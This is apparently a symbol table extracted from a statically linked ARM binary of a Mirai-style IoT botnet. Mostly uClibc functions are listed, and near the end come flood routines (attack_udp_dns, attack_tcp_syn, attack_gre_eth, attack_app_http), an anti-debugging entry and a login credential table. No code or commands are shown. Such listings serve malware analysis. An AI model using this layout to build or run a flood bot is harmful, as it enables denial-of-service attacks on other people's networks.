                                  _GLOBAL_OFFSET_TABLE_.symtab0x2a0100OBJECT<unknown>HIDDEN12
                                  _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _Unwind_Complete.symtab0x1ef444FUNC<unknown>HIDDEN2
                                  _Unwind_DeleteException.symtab0x1ef4844FUNC<unknown>HIDDEN2
                                  _Unwind_ForcedUnwind.symtab0x1fbf836FUNC<unknown>HIDDEN2
                                  _Unwind_GetCFA.symtab0x1ef3c8FUNC<unknown>HIDDEN2
                                  _Unwind_GetDataRelBase.symtab0x1ef8012FUNC<unknown>HIDDEN2
                                  _Unwind_GetLanguageSpecificData.symtab0x1fc1c68FUNC<unknown>HIDDEN2
                                  _Unwind_GetRegionStart.symtab0x203bc52FUNC<unknown>HIDDEN2
                                  _Unwind_GetTextRelBase.symtab0x1ef7412FUNC<unknown>HIDDEN2
                                  _Unwind_RaiseException.symtab0x1fb8c36FUNC<unknown>HIDDEN2
                                  _Unwind_Resume.symtab0x1fbb036FUNC<unknown>HIDDEN2
                                  _Unwind_Resume_or_Rethrow.symtab0x1fbd436FUNC<unknown>HIDDEN2
                                  _Unwind_VRS_Get.symtab0x1eea476FUNC<unknown>HIDDEN2
                                  _Unwind_VRS_Pop.symtab0x1f4bc324FUNC<unknown>HIDDEN2
                                  _Unwind_VRS_Set.symtab0x1eef076FUNC<unknown>HIDDEN2
                                  _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __C_ctype_b.symtab0x2a2084OBJECT<unknown>DEFAULT13
                                  __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __C_ctype_b_data.symtab0x21a46768OBJECT<unknown>DEFAULT4
                                  __EH_FRAME_BEGIN__.symtab0x2a0000OBJECT<unknown>DEFAULT7
                                  __FRAME_END__.symtab0x2a0000OBJECT<unknown>DEFAULT7
                                  __GI___C_ctype_b.symtab0x2a2084OBJECT<unknown>HIDDEN13
                                  __GI___close.symtab0x1b2e0100FUNC<unknown>HIDDEN2
                                  __GI___close_nocancel.symtab0x1b2c424FUNC<unknown>HIDDEN2
                                  __GI___ctype_b.symtab0x2a20c4OBJECT<unknown>HIDDEN13
                                  __GI___errno_location.symtab0x17d1832FUNC<unknown>HIDDEN2
                                  __GI___fcntl_nocancel.symtab0x173dc152FUNC<unknown>HIDDEN2
                                  __GI___fgetc_unlocked.symtab0x1da14300FUNC<unknown>HIDDEN2
                                  __GI___libc_close.symtab0x1b2e0100FUNC<unknown>HIDDEN2
                                  __GI___libc_fcntl.symtab0x17474244FUNC<unknown>HIDDEN2
                                  __GI___libc_open.symtab0x1b370100FUNC<unknown>HIDDEN2
                                  __GI___libc_read.symtab0x1b490100FUNC<unknown>HIDDEN2
                                  __GI___libc_write.symtab0x1b400100FUNC<unknown>HIDDEN2
                                  __GI___open.symtab0x1b370100FUNC<unknown>HIDDEN2
                                  __GI___open_nocancel.symtab0x1b35424FUNC<unknown>HIDDEN2
                                  __GI___read.symtab0x1b490100FUNC<unknown>HIDDEN2
                                  __GI___read_nocancel.symtab0x1b47424FUNC<unknown>HIDDEN2
                                  __GI___sigaddset.symtab0x1868036FUNC<unknown>HIDDEN2
                                  __GI___sigdelset.symtab0x186a436FUNC<unknown>HIDDEN2
                                  __GI___sigismember.symtab0x1865c36FUNC<unknown>HIDDEN2
                                  __GI___uClibc_fini.symtab0x1b6a8124FUNC<unknown>HIDDEN2
                                  __GI___uClibc_init.symtab0x1b77888FUNC<unknown>HIDDEN2
                                  __GI___write.symtab0x1b400100FUNC<unknown>HIDDEN2
                                  __GI___write_nocancel.symtab0x1b3e424FUNC<unknown>HIDDEN2
                                  __GI__exit.symtab0x1bd60104FUNC<unknown>HIDDEN2
                                  __GI_abort.symtab0x19a58296FUNC<unknown>HIDDEN2
                                  __GI_accept.symtab0x17f60116FUNC<unknown>HIDDEN2
                                  __GI_atoi.symtab0x1a1a432FUNC<unknown>HIDDEN2
                                  __GI_bind.symtab0x17fd468FUNC<unknown>HIDDEN2
                                  __GI_brk.symtab0x1e96c88FUNC<unknown>HIDDEN2
                                  __GI_close.symtab0x1b2e0100FUNC<unknown>HIDDEN2
                                  __GI_closedir.symtab0x178dc272FUNC<unknown>HIDDEN2
                                  __GI_config_close.symtab0x1c71852FUNC<unknown>HIDDEN2
                                  __GI_config_open.symtab0x1c74c72FUNC<unknown>HIDDEN2
                                  __GI_config_read.symtab0x1c3f0808FUNC<unknown>HIDDEN2
                                  __GI_connect.symtab0x1805c116FUNC<unknown>HIDDEN2
                                  __GI_exit.symtab0x1a3b8196FUNC<unknown>HIDDEN2
                                  __GI_fclose.symtab0x1c794816FUNC<unknown>HIDDEN2
                                  __GI_fcntl.symtab0x17474244FUNC<unknown>HIDDEN2
                                  __GI_fflush_unlocked.symtab0x1d668940FUNC<unknown>HIDDEN2
                                  __GI_fgetc.symtab0x1d158324FUNC<unknown>HIDDEN2
                                  __GI_fgetc_unlocked.symtab0x1da14300FUNC<unknown>HIDDEN2
                                  __GI_fgets.symtab0x1d29c284FUNC<unknown>HIDDEN2
                                  __GI_fgets_unlocked.symtab0x1db40160FUNC<unknown>HIDDEN2
                                  __GI_fopen.symtab0x1cac432FUNC<unknown>HIDDEN2
                                  __GI_fork.symtab0x1abec972FUNC<unknown>HIDDEN2
                                  __GI_fstat.symtab0x1bdc8100FUNC<unknown>HIDDEN2
                                  __GI_getc_unlocked.symtab0x1da14300FUNC<unknown>HIDDEN2
                                  __GI_getdtablesize.symtab0x1becc44FUNC<unknown>HIDDEN2
                                  __GI_getegid.symtab0x1bef820FUNC<unknown>HIDDEN2
                                  __GI_geteuid.symtab0x1bf0c20FUNC<unknown>HIDDEN2
                                  __GI_getgid.symtab0x1bf2020FUNC<unknown>HIDDEN2
                                  __GI_getpagesize.symtab0x1bf3440FUNC<unknown>HIDDEN2
                                  __GI_getpid.symtab0x1b05072FUNC<unknown>HIDDEN2
                                  __GI_getrlimit.symtab0x1bf5c56FUNC<unknown>HIDDEN2
                                  __GI_getsockname.symtab0x180d068FUNC<unknown>HIDDEN2
                                  __GI_gettimeofday.symtab0x1bf9464FUNC<unknown>HIDDEN2
                                  __GI_getuid.symtab0x1bfd420FUNC<unknown>HIDDEN2
                                  __GI_inet_addr.symtab0x17ef440FUNC<unknown>HIDDEN2
                                  __GI_inet_aton.symtab0x1e4a4248FUNC<unknown>HIDDEN2
                                  __GI_initstate_r.symtab0x19fc0248FUNC<unknown>HIDDEN2
                                  __GI_ioctl.symtab0x1757c224FUNC<unknown>HIDDEN2
                                  __GI_isatty.symtab0x1e40436FUNC<unknown>HIDDEN2
                                  __GI_kill.symtab0x1765c56FUNC<unknown>HIDDEN2
                                  __GI_listen.symtab0x1815c64FUNC<unknown>HIDDEN2
                                  __GI_lseek64.symtab0x1ee34112FUNC<unknown>HIDDEN2
                                  __GI_memcpy.symtab0x17d704FUNC<unknown>HIDDEN2
                                  __GI_memmove.symtab0x17d804FUNC<unknown>HIDDEN2
                                  __GI_mempcpy.symtab0x1ed2036FUNC<unknown>HIDDEN2
                                  __GI_memset.symtab0x17d90156FUNC<unknown>HIDDEN2
                                  __GI_mmap.symtab0x1bbbc124FUNC<unknown>HIDDEN2
                                  __GI_mremap.symtab0x1bfe868FUNC<unknown>HIDDEN2
                                  __GI_munmap.symtab0x1c02c64FUNC<unknown>HIDDEN2
                                  __GI_nanosleep.symtab0x1c0ac96FUNC<unknown>HIDDEN2
                                  __GI_open.symtab0x1b370100FUNC<unknown>HIDDEN2
                                  __GI_opendir.symtab0x17abc196FUNC<unknown>HIDDEN2
                                  __GI_raise.symtab0x1b098240FUNC<unknown>HIDDEN2
                                  __GI_random.symtab0x19b98164FUNC<unknown>HIDDEN2
                                  __GI_random_r.symtab0x19e58144FUNC<unknown>HIDDEN2
                                  __GI_rawmemchr.symtab0x1ed44176FUNC<unknown>HIDDEN2
                                  __GI_read.symtab0x1b490100FUNC<unknown>HIDDEN2
                                  __GI_readdir.symtab0x17c30232FUNC<unknown>HIDDEN2
                                  __GI_readdir64.symtab0x1c304236FUNC<unknown>HIDDEN2
                                  __GI_readlink.symtab0x176d864FUNC<unknown>HIDDEN2
                                  __GI_recv.symtab0x181e0112FUNC<unknown>HIDDEN2
                                  __GI_recvfrom.symtab0x18298136FUNC<unknown>HIDDEN2
                                  __GI_sbrk.symtab0x1c10c108FUNC<unknown>HIDDEN2
                                  __GI_select.symtab0x1775c132FUNC<unknown>HIDDEN2
                                  __GI_send.symtab0x18364112FUNC<unknown>HIDDEN2
                                  __GI_sendto.symtab0x18420136FUNC<unknown>HIDDEN2
                                  __GI_setsid.symtab0x177e064FUNC<unknown>HIDDEN2
                                  __GI_setsockopt.symtab0x184a872FUNC<unknown>HIDDEN2
                                  __GI_setstate_r.symtab0x1a0b8236FUNC<unknown>HIDDEN2
                                  __GI_sigaction.symtab0x1bc64136FUNC<unknown>HIDDEN2
                                  __GI_sigaddset.symtab0x1853480FUNC<unknown>HIDDEN2
                                  __GI_sigemptyset.symtab0x1858420FUNC<unknown>HIDDEN2
                                  __GI_signal.symtab0x18598196FUNC<unknown>HIDDEN2
                                  __GI_sigprocmask.symtab0x17820140FUNC<unknown>HIDDEN2
                                  __GI_sleep.symtab0x1b188300FUNC<unknown>HIDDEN2
                                  __GI_socket.symtab0x184f068FUNC<unknown>HIDDEN2
                                  __GI_srandom_r.symtab0x19ee8216FUNC<unknown>HIDDEN2
                                  __GI_strchr.symtab0x1e090240FUNC<unknown>HIDDEN2
                                  __GI_strchrnul.symtab0x1e180236FUNC<unknown>HIDDEN2
                                  __GI_strcmp.symtab0x1e07028FUNC<unknown>HIDDEN2
                                  __GI_strcoll.symtab0x1e07028FUNC<unknown>HIDDEN2
                                  __GI_strcspn.symtab0x1e26c68FUNC<unknown>HIDDEN2
                                  __GI_strdup.symtab0x17e9052FUNC<unknown>HIDDEN2
                                  __GI_strlen.symtab0x17e3096FUNC<unknown>HIDDEN2
                                  __GI_strpbrk.symtab0x1e3c464FUNC<unknown>HIDDEN2
                                  __GI_strrchr.symtab0x1e2b080FUNC<unknown>HIDDEN2
                                  __GI_strspn.symtab0x1e30076FUNC<unknown>HIDDEN2
                                  __GI_strtok.symtab0x17ec448FUNC<unknown>HIDDEN2
                                  __GI_strtok_r.symtab0x1e34c120FUNC<unknown>HIDDEN2
                                  __GI_strtol.symtab0x1a1c428FUNC<unknown>HIDDEN2
                                  __GI_sysconf.symtab0x1a5c81572FUNC<unknown>HIDDEN2
                                  __GI_tcgetattr.symtab0x1e428124FUNC<unknown>HIDDEN2
                                  __GI_time.symtab0x178ac48FUNC<unknown>HIDDEN2
                                  __GI_times.symtab0x1c17820FUNC<unknown>HIDDEN2
                                  __GI_write.symtab0x1b400100FUNC<unknown>HIDDEN2
                                  __JCR_END__.symtab0x2a00c0OBJECT<unknown>DEFAULT11
                                  __JCR_LIST__.symtab0x2a00c0OBJECT<unknown>DEFAULT11
                                  ___Unwind_ForcedUnwind.symtab0x1fbf836FUNC<unknown>HIDDEN2
                                  ___Unwind_RaiseException.symtab0x1fb8c36FUNC<unknown>HIDDEN2
                                  ___Unwind_Resume.symtab0x1fbb036FUNC<unknown>HIDDEN2
                                  ___Unwind_Resume_or_Rethrow.symtab0x1fbd436FUNC<unknown>HIDDEN2
                                  __aeabi_idiv.symtab0x172840FUNC<unknown>HIDDEN2
                                  __aeabi_idivmod.symtab0x173b024FUNC<unknown>HIDDEN2
                                  __aeabi_read_tp.symtab0x1bd108FUNC<unknown>DEFAULT2
                                  __aeabi_uidiv.symtab0x171700FUNC<unknown>HIDDEN2
                                  __aeabi_uidivmod.symtab0x1726c24FUNC<unknown>HIDDEN2
                                  __aeabi_unwind_cpp_pr0.symtab0x1fb588FUNC<unknown>HIDDEN2
                                  __aeabi_unwind_cpp_pr1.symtab0x1fb508FUNC<unknown>HIDDEN2
                                  __aeabi_unwind_cpp_pr2.symtab0x1fb488FUNC<unknown>HIDDEN2
                                  __app_fini.symtab0x2a9744OBJECT<unknown>HIDDEN14
                                  __atexit_lock.symtab0x2a1e424OBJECT<unknown>DEFAULT13
                                  __bss_end__.symtab0x2d52c0NOTYPE<unknown>DEFAULTSHN_ABS
                                  __bss_start.symtab0x2a2f80NOTYPE<unknown>DEFAULTSHN_ABS
                                  __bss_start__.symtab0x2a2f80NOTYPE<unknown>DEFAULTSHN_ABS
                                  __check_one_fd.symtab0x1b72484FUNC<unknown>DEFAULT2
                                  __close.symtab0x1b2e0100FUNC<unknown>DEFAULT2
                                  __close_nocancel.symtab0x1b2c424FUNC<unknown>DEFAULT2
                                  __ctype_b.symtab0x2a20c4OBJECT<unknown>DEFAULT13
                                  __curbrk.symtab0x2ced84OBJECT<unknown>HIDDEN14
                                  __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __data_start.symtab0x2a0b80NOTYPE<unknown>DEFAULT13
                                  __default_rt_sa_restorer.symtab0x1bd040FUNC<unknown>DEFAULT2
                                  __default_sa_restorer.symtab0x1bcf80FUNC<unknown>DEFAULT2
                                  __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __div0.symtab0x173c820FUNC<unknown>HIDDEN2
                                  __divsi3.symtab0x17284300FUNC<unknown>HIDDEN2
                                  __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                  __do_global_dtors_aux_fini_array_entry.symtab0x2a0080OBJECT<unknown>DEFAULT10
                                  __end__.symtab0x2d52c0NOTYPE<unknown>DEFAULTSHN_ABS
                                  __environ.symtab0x2a96c4OBJECT<unknown>DEFAULT14
                                  __errno_location.symtab0x17d1832FUNC<unknown>DEFAULT2
                                  __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __exidx_end.symtab0x21ea80NOTYPE<unknown>DEFAULTSHN_ABS
                                  __exidx_start.symtab0x21d900NOTYPE<unknown>DEFAULTSHN_ABS
                                  __exit_cleanup.symtab0x2a41c4OBJECT<unknown>HIDDEN14
                                  __fcntl_nocancel.symtab0x173dc152FUNC<unknown>DEFAULT2
                                  __fgetc_unlocked.symtab0x1da14300FUNC<unknown>DEFAULT2
                                  __fini_array_end.symtab0x2a00c0NOTYPE<unknown>HIDDEN10
                                  __fini_array_start.symtab0x2a0080NOTYPE<unknown>HIDDEN10
                                  __fork.symtab0x1abec972FUNC<unknown>DEFAULT2
                                  __fork_generation_pointer.symtab0x2d4f84OBJECT<unknown>HIDDEN14
                                  __fork_handlers.symtab0x2d4fc4OBJECT<unknown>HIDDEN14
                                  __fork_lock.symtab0x2a4204OBJECT<unknown>HIDDEN14
                                  __frame_dummy_init_array_entry.symtab0x2a0040OBJECT<unknown>DEFAULT9
                                  __getdents.symtab0x1be2c160FUNC<unknown>HIDDEN2
                                  __getdents64.symtab0x1e9d0328FUNC<unknown>HIDDEN2
                                  __getpagesize.symtab0x1bf3440FUNC<unknown>DEFAULT2
                                  __getpid.symtab0x1b05072FUNC<unknown>DEFAULT2
                                  __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __gnu_Unwind_ForcedUnwind.symtab0x1f2fc28FUNC<unknown>HIDDEN2
                                  __gnu_Unwind_RaiseException.symtab0x1f3e4184FUNC<unknown>HIDDEN2
                                  __gnu_Unwind_Restore_VFP.symtab0x1fb7c0FUNC<unknown>HIDDEN2
                                  __gnu_Unwind_Resume.symtab0x1f378108FUNC<unknown>HIDDEN2
                                  __gnu_Unwind_Resume_or_Rethrow.symtab0x1f49c32FUNC<unknown>HIDDEN2
                                  __gnu_Unwind_Save_VFP.symtab0x1fb840FUNC<unknown>HIDDEN2
                                  __gnu_unwind_execute.symtab0x1fc601812FUNC<unknown>HIDDEN2
                                  __gnu_unwind_frame.symtab0x2037472FUNC<unknown>HIDDEN2
                                  __gnu_unwind_pr_common.symtab0x1f6001352FUNC<unknown>DEFAULT2
                                  __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __init_array_end.symtab0x2a0080NOTYPE<unknown>HIDDEN9
                                  __init_array_start.symtab0x2a0040NOTYPE<unknown>HIDDEN9
                                  __libc_accept.symtab0x17f60116FUNC<unknown>DEFAULT2
                                  __libc_close.symtab0x1b2e0100FUNC<unknown>DEFAULT2
                                  __libc_connect.symtab0x1805c116FUNC<unknown>DEFAULT2
                                  __libc_disable_asynccancel.symtab0x1b500136FUNC<unknown>HIDDEN2
                                  __libc_enable_asynccancel.symtab0x1b588220FUNC<unknown>HIDDEN2
                                  __libc_errno.symtab0x04TLS<unknown>HIDDEN8
                                  __libc_fcntl.symtab0x17474244FUNC<unknown>DEFAULT2
                                  __libc_fork.symtab0x1abec972FUNC<unknown>DEFAULT2
                                  __libc_h_errno.symtab0x44TLS<unknown>HIDDEN8
                                  __libc_multiple_threads.symtab0x2d5004OBJECT<unknown>HIDDEN14
                                  __libc_nanosleep.symtab0x1c0ac96FUNC<unknown>DEFAULT2
                                  __libc_open.symtab0x1b370100FUNC<unknown>DEFAULT2
                                  __libc_read.symtab0x1b490100FUNC<unknown>DEFAULT2
                                  __libc_recv.symtab0x181e0112FUNC<unknown>DEFAULT2
                                  __libc_recvfrom.symtab0x18298136FUNC<unknown>DEFAULT2
                                  __libc_select.symtab0x1775c132FUNC<unknown>DEFAULT2
                                  __libc_send.symtab0x18364112FUNC<unknown>DEFAULT2
                                  __libc_sendto.symtab0x18420136FUNC<unknown>DEFAULT2
                                  __libc_setup_tls.symtab0x1e6a0560FUNC<unknown>DEFAULT2
                                  __libc_sigaction.symtab0x1bc64136FUNC<unknown>DEFAULT2
                                  __libc_stack_end.symtab0x2a9684OBJECT<unknown>DEFAULT14
                                  __libc_write.symtab0x1b400100FUNC<unknown>DEFAULT2
                                  __lll_lock_wait_private.symtab0x1afb8152FUNC<unknown>HIDDEN2
                                  __malloc_consolidate.symtab0x19628436FUNC<unknown>HIDDEN2
                                  __malloc_largebin_index.symtab0x186c8120FUNC<unknown>DEFAULT2
                                  __malloc_lock.symtab0x2a10824OBJECT<unknown>DEFAULT13
                                  __malloc_state.symtab0x2d180888OBJECT<unknown>DEFAULT14
                                  __malloc_trim.symtab0x19578176FUNC<unknown>DEFAULT2
                                  __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __open.symtab0x1b370100FUNC<unknown>DEFAULT2
                                  __open_nocancel.symtab0x1b35424FUNC<unknown>DEFAULT2
                                  __pagesize.symtab0x2a9704OBJECT<unknown>DEFAULT14
                                  __preinit_array_end.symtab0x2a0040NOTYPE<unknown>HIDDEN8
                                  __preinit_array_start.symtab0x2a0040NOTYPE<unknown>HIDDEN8
                                  __progname.symtab0x2a2004OBJECT<unknown>DEFAULT13
                                  __progname_full.symtab0x2a2044OBJECT<unknown>DEFAULT13
                                  __pthread_initialize_minimal.symtab0x1e8d012FUNC<unknown>DEFAULT2
                                  __pthread_mutex_init.symtab0x1b66c8FUNC<unknown>DEFAULT2
                                  __pthread_mutex_lock.symtab0x1b6648FUNC<unknown>DEFAULT2
                                  __pthread_mutex_trylock.symtab0x1b6648FUNC<unknown>DEFAULT2
                                  __pthread_mutex_unlock.symtab0x1b6648FUNC<unknown>DEFAULT2
                                  __pthread_return_0.symtab0x1b6648FUNC<unknown>DEFAULT2
                                  __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __read.symtab0x1b490100FUNC<unknown>DEFAULT2
                                  __read_nocancel.symtab0x1b47424FUNC<unknown>DEFAULT2
                                  __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                  __restore_core_regs.symtab0x1fb6028FUNC<unknown>HIDDEN2
                                  __rtld_fini.symtab0x2a9784OBJECT<unknown>HIDDEN14
                                  __sigaddset.symtab0x1868036FUNC<unknown>DEFAULT2
                                  __sigdelset.symtab0x186a436FUNC<unknown>DEFAULT2
                                  __sigismember.symtab0x1865c36FUNC<unknown>DEFAULT2
                                  __sigjmp_save.symtab0x1edf464FUNC<unknown>HIDDEN2
                                  __sigsetjmp.symtab0x1e9c412FUNC<unknown>DEFAULT2
                                  __stdin.symtab0x2a2204OBJECT<unknown>DEFAULT13
                                  __stdio_READ.symtab0x1eb1888FUNC<unknown>HIDDEN2
                                  __stdio_WRITE.symtab0x1eb70220FUNC<unknown>HIDDEN2
                                  __stdio_rfill.symtab0x1ec4c48FUNC<unknown>HIDDEN2
                                  __stdio_trans2r_o.symtab0x1ec7c164FUNC<unknown>HIDDEN2
                                  __stdio_wcommit.symtab0x1d12848FUNC<unknown>HIDDEN2
                                  __stdout.symtab0x2a2244OBJECT<unknown>DEFAULT13
                                  __sys_accept.symtab0x17f1c68FUNC<unknown>DEFAULT2
                                  __sys_connect.symtab0x1801868FUNC<unknown>DEFAULT2
                                  __sys_recv.symtab0x1819c68FUNC<unknown>DEFAULT2
                                  __sys_recvfrom.symtab0x1825072FUNC<unknown>DEFAULT2
                                  __sys_send.symtab0x1832068FUNC<unknown>DEFAULT2
                                  __sys_sendto.symtab0x183d476FUNC<unknown>DEFAULT2
                                  __syscall_error.symtab0x1bc3844FUNC<unknown>HIDDEN2
                                  __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __syscall_nanosleep.symtab0x1c06c64FUNC<unknown>DEFAULT2
                                  __syscall_rt_sigaction.symtab0x1bd2064FUNC<unknown>DEFAULT2
                                  __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __syscall_select.symtab0x1771868FUNC<unknown>DEFAULT2
                                  __tls_get_addr.symtab0x1e67c36FUNC<unknown>DEFAULT2
                                  __uClibc_fini.symtab0x1b6a8124FUNC<unknown>DEFAULT2
                                  __uClibc_init.symtab0x1b77888FUNC<unknown>DEFAULT2
                                  __uClibc_main.symtab0x1b7d01004FUNC<unknown>DEFAULT2
                                  __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  __uclibc_progname.symtab0x2a1fc4OBJECT<unknown>HIDDEN13
                                  __udivsi3.symtab0x17170252FUNC<unknown>HIDDEN2
                                  __write.symtab0x1b400100FUNC<unknown>DEFAULT2
                                  __write_nocancel.symtab0x1b3e424FUNC<unknown>DEFAULT2
                                  __xstat32_conv.symtab0x1c258172FUNC<unknown>HIDDEN2
                                  __xstat64_conv.symtab0x1c18c204FUNC<unknown>HIDDEN2
                                  _bss_end__.symtab0x2d52c0NOTYPE<unknown>DEFAULTSHN_ABS
                                  _dl_aux_init.symtab0x1e8dc56FUNC<unknown>DEFAULT2
                                  _dl_nothread_init_static_tls.symtab0x1e91488FUNC<unknown>HIDDEN2
                                  _dl_phdr.symtab0x2d5244OBJECT<unknown>DEFAULT14
                                  _dl_phnum.symtab0x2d5284OBJECT<unknown>DEFAULT14
                                  _dl_tls_dtv_gaps.symtab0x2d5181OBJECT<unknown>DEFAULT14
                                  _dl_tls_dtv_slotinfo_list.symtab0x2d5144OBJECT<unknown>DEFAULT14
                                  _dl_tls_generation.symtab0x2d51c4OBJECT<unknown>DEFAULT14
                                  _dl_tls_max_dtv_idx.symtab0x2d50c4OBJECT<unknown>DEFAULT14
                                  _dl_tls_setup.symtab0x1e614104FUNC<unknown>DEFAULT2
                                  _dl_tls_static_align.symtab0x2d5084OBJECT<unknown>DEFAULT14
                                  _dl_tls_static_nelem.symtab0x2d5204OBJECT<unknown>DEFAULT14
                                  _dl_tls_static_size.symtab0x2d5104OBJECT<unknown>DEFAULT14
                                  _dl_tls_static_used.symtab0x2d5044OBJECT<unknown>DEFAULT14
                                  _edata.symtab0x2a2f80NOTYPE<unknown>DEFAULTSHN_ABS
                                  _end.symtab0x2d52c0NOTYPE<unknown>DEFAULTSHN_ABS
                                  _exit.symtab0x1bd60104FUNC<unknown>DEFAULT2
                                  _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _fini.symtab0x203f00FUNC<unknown>DEFAULT3
                                  _fixed_buffers.symtab0x2a99c8192OBJECT<unknown>DEFAULT14
                                  _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _init.symtab0x80d40FUNC<unknown>DEFAULT1
                                  _memcpy.symtab0x1dbe00FUNC<unknown>HIDDEN2
                                  _pthread_cleanup_pop_restore.symtab0x1b67c44FUNC<unknown>DEFAULT2
                                  _pthread_cleanup_push_defer.symtab0x1b6748FUNC<unknown>DEFAULT2
                                  _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _setjmp.symtab0x1bcec8FUNC<unknown>DEFAULT2
                                  _sigintr.symtab0x2d1788OBJECT<unknown>HIDDEN14
                                  _start.symtab0x81940FUNC<unknown>DEFAULT2
                                  _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _stdio_fopen.symtab0x1cae41120FUNC<unknown>HIDDEN2
                                  _stdio_init.symtab0x1cf44128FUNC<unknown>HIDDEN2
                                  _stdio_openlist.symtab0x2a2284OBJECT<unknown>DEFAULT13
                                  _stdio_openlist_add_lock.symtab0x2a97c12OBJECT<unknown>DEFAULT14
                                  _stdio_openlist_dec_use.symtab0x1d3b8688FUNC<unknown>HIDDEN2
                                  _stdio_openlist_del_count.symtab0x2a9984OBJECT<unknown>DEFAULT14
                                  _stdio_openlist_del_lock.symtab0x2a98812OBJECT<unknown>DEFAULT14
                                  _stdio_openlist_use_count.symtab0x2a9944OBJECT<unknown>DEFAULT14
                                  _stdio_streams.symtab0x2a22c204OBJECT<unknown>DEFAULT13
                                  _stdio_term.symtab0x1cfc4356FUNC<unknown>HIDDEN2
                                  _stdio_user_locking.symtab0x2a2104OBJECT<unknown>DEFAULT13
                                  _stdlib_strto_l.symtab0x1a1e0472FUNC<unknown>HIDDEN2
                                  _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  abort.symtab0x19a58296FUNC<unknown>DEFAULT2
                                  abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  accept.symtab0x17f60116FUNC<unknown>DEFAULT2
                                  accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  add_auth_entry.symtab0x14078352FUNC<unknown>DEFAULT2
                                  anti_gdb_entry.symtab0x12bb824FUNC<unknown>DEFAULT2
                                  atoi.symtab0x1a1a432FUNC<unknown>DEFAULT2
                                  atol.symtab0x1a1a432FUNC<unknown>DEFAULT2
                                  atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack_app.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack_app_http.symtab0x81d08048FUNC<unknown>DEFAULT2
                                  attack_get_opt_int.symtab0xa5b0112FUNC<unknown>DEFAULT2
                                  attack_get_opt_ip.symtab0xa544108FUNC<unknown>DEFAULT2
                                  attack_get_opt_str.symtab0xa14092FUNC<unknown>DEFAULT2
                                  attack_gre.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack_gre_eth.symtab0xaaa41684FUNC<unknown>DEFAULT2
                                  attack_gre_ip.symtab0xb1381564FUNC<unknown>DEFAULT2
                                  attack_init.symtab0xa6201156FUNC<unknown>DEFAULT2
                                  attack_kill_all.symtab0xa298144FUNC<unknown>DEFAULT2
                                  attack_method_raw.symtab0xdad01684FUNC<unknown>DEFAULT2
                                  attack_ongoing.symtab0x2a31c12OBJECT<unknown>DEFAULT14
                                  attack_parse.symtab0xa328540FUNC<unknown>DEFAULT2
                                  attack_start.symtab0xa19c252FUNC<unknown>DEFAULT2
                                  attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack_tcp_ack.symtab0xbf681784FUNC<unknown>DEFAULT2
                                  attack_tcp_bypass.symtab0xc6601708FUNC<unknown>DEFAULT2
                                  attack_tcp_stomp.symtab0xb7542068FUNC<unknown>DEFAULT2
                                  attack_tcp_syn.symtab0xcd0c1708FUNC<unknown>DEFAULT2
                                  attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  attack_udp_custom.symtab0xe73c1184FUNC<unknown>DEFAULT2
                                  attack_udp_dns.symtab0xf09c1952FUNC<unknown>DEFAULT2
                                  attack_udp_generic.symtab0xe1641496FUNC<unknown>DEFAULT2
                                  attack_udp_plain.symtab0xd3b81012FUNC<unknown>DEFAULT2
                                  attack_udp_stdhex.symtab0xd7ac804FUNC<unknown>DEFAULT2
                                  attack_udp_vse.symtab0xebdc1216FUNC<unknown>DEFAULT2
                                  auth_table.symtab0x2a4084OBJECT<unknown>DEFAULT14
                                  auth_table_len.symtab0x2a3dc4OBJECT<unknown>DEFAULT14
                                  auth_table_max_weight.symtab0x2a40c2OBJECT<unknown>DEFAULT14
                                  been_there_done_that.symtab0x2a4184OBJECT<unknown>DEFAULT14
                                  bind.symtab0x17fd468FUNC<unknown>DEFAULT2
                                  bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  brk.symtab0x1e96c88FUNC<unknown>DEFAULT2
                                  brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
